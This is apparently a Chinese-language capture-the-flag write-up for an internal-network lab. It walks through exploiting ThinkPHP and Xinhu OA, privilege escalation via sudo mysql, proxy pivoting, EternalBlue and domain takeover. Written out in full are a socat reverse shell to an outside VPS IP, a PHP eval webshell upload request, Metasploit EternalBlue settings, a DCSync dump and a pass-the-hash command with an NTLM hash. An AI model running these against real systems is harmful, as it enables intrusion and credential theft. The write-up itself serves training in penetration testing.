Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。
fscan扫描一下

有一个thinkphp的漏洞

找一个thinkphp利用工具
蚁剑链接

发现是www-data用户,而且权限很低,但是可以使用mysql,并且是root权限
写一个反弹shell
上传socat

在VPS上:socat file:`tty`,raw,echo=0 tcp-listen:9999,bind=0.0.0.0,reuseaddr,fork
在靶机上:socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:45.144.136.75:9999
这样直接有一个交互式的终端,后续不用再加tty了(这个靶机有python3,比socat更方便,我只是试一下新方法)

https://int0x33.github.io/gtfobins/mysql/
用这个网站,可以查看提权命令

mysql的是
sudo mysql -e '\! /bin/sh'

成功拿到第一个机器的权限

在/root/flag/flag01.txt获得第一个flag
flag{60b53231-
搭建内网代理
只有一个内网网卡,可能是反向代理

传linux_x64_agent

在VPS上:./linux_x64_admin -l 6060
靶机上:./linux_x64_agent -c 45.144.136.75:6060


分配代理

(admin) >> use 0
(node 0) >> socks 1234
在windows本机上


代理搭建完成,fscan扫一遍
fscan.exe -h 172.22.1.0/24 –socks5 45.144.136.75:1234

出现了其他ip为2,18,21的主机并且21主机有MS_010漏洞,18主机有一个信呼OA服务,2主机是Windows Server 2016 Datacenter 14393系统
172.22.1.18弱口令admin\admin123登录

信呼协同办公系统v2.2.8 存在后台文件上传漏洞
burpsuite设置上游socks5代理

POST /index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=769871 HTTP/1.1
Host: 172.22.1.18
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Cookie: PHPSESSID=s4bquk0oscain6mpo9h16njmtr; deviceid=1784712882353; xinhu_mo_adminid=aqq0nq0arq0na0xi0na0dd0ara0xp0nq0pm0ni09; xinhu_ca_adminuser=admin; xinhu_ca_rempass=1; xinhu_ca_adminpass=mu0mr0mb0ooa0ur0mr0qb0obf0rr0ofa0rr0qm04
Content-Type:multipart/form-data; boundary=---------------------------40605609116060410203660967062
Content-Length: 257
-----------------------------40605609116060410203660967062
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream
<?php eval($_POST['shell']);?>
-----------------------------40605609116060410203660967062--
换一下cookies就能用了
上传成功后会返回一个filepath和id

访问这个id
http://172.22.1.18/task.php?m=qcloudCos|runt&a=run&fileid=10
GET /task.php?m=qcloudCos|runt&a=run&fileid=9 HTTP/1.1
Host: 172.22.1.18
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://172.22.1.18/
Cookie: PHPSESSID=s4bquk0oscain6mpo9h16njmtr; deviceid=1784712882353; xinhu_mo_adminid=aqq0nq0arq0na0xi0na0dd0ara0xp0nq0pm0ni09; xinhu_ca_adminuser=admin; xinhu_ca_rempass=1; xinhu_ca_adminpass=mu0mr0mb0ooa0ur0mr0qb0obf0rr0ofa0rr0qm04
upload中的php木马可以正常访问了

蚁剑链接
得到第二个flag

还剩个21和2,21有永恒之蓝
msf一把梭
设置proxychains
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
setg Proxies socks5:45.144.136.75:1234
setg ReverseAllowProxy true
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
run

连上了

域是xiaorang.lab
抓取凭证
load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
flag03:e8f88d0d43d6}









